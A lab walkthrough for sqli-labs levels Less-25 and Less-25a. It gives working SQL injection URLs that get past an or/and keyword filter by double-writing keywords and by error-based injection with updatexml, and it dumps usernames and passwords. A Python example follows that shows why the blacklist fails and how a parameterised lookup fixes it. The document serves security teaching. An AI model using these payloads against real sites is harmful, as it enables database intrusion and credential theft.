less-25
Background: the later levels involve WAF bypass.
There are three main approaches: white-box bypass, black-box bypass, and fuzz testing.
There are many SQL injection WAF bypass tutorials online that you can look up yourself; in short, it comes down to who can think more deviously.
From the hint and the source code of Less-25, we find that or and and (case-insensitive) are filtered and stripped out of the input.
The first method: double-writing
The earlier steps are the same as before, so only the final step is shown here: http://192.168.5.100/sqli-labs/Less-25/?id=0' union select 1,2,group_concat(concat_ws('-',username,passwoorrd)) from security.users--+ (note that the or inside password is written twice)
The second method: replace or with ||, using error-based injection
http://192.168.5.100/sqli-labs/Less-25/?id=0' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+
Step through the rows one at a time in the same way to extract all the data. group_concat() cannot be used here because the data it returns would be incomplete.
less-25a
By observation, the previous level wraps the id in a single quote ('), whereas this level has no wrapping at all; it also filters or and and:
http://192.168.5.100/sqli-labs/Less-25a/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+
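
Why the keyword filter in Less-25 and Less-25a fails as a defense, and what replaces it, shown as an added Python example (not code from sqli-labs or from this post). It assumes the filter is a single case-insensitive pass that deletes or and and; the table, rows, probe string and function names are constructed for illustration.

```python
import re
import sqlite3

def strip_keywords(value):
    # Assumed model of the filter: one case-insensitive pass per keyword,
    # each match replaced with nothing. The result is never re-scanned.
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)
    return re.sub(r"and", "", value, flags=re.IGNORECASE)

def make_db():
    # Constructed sample data, not the lab's real table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return db

def lookup_filtered(db, raw_id):
    # Weak pattern: blacklist the input, then splice it into the SQL text.
    sql = ("SELECT username FROM users WHERE id='"
           + strip_keywords(raw_id) + "' ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, raw_id):
    # Corrected pattern: accept only decimal digits, then bind the value so
    # it is never parsed as SQL, whatever keywords it contains.
    if not re.fullmatch(r"[0-9]+", raw_id):
        return []
    return [row[0] for row in db.execute(
        "SELECT username FROM users WHERE id = ?", (int(raw_id),))]

if __name__ == "__main__":
    db = make_db()
    probe = "0' oorr '1'='1"  # constructed input using the double-write idea
    print(strip_keywords("passwoorrd"))  # keyword reassembles after one pass
    print(strip_keywords("Oregon"))      # legitimate data is damaged too
    print(lookup_filtered(db, probe))    # filter passed, condition altered
    print(lookup_hardened(db, probe))    # rejected before reaching SQL
    print(lookup_hardened(db, "1"))      # normal lookup still works
```

The same hardened lookup covers both levels, since quoting the id or leaving it unquoted no longer matters once the value is validated and bound.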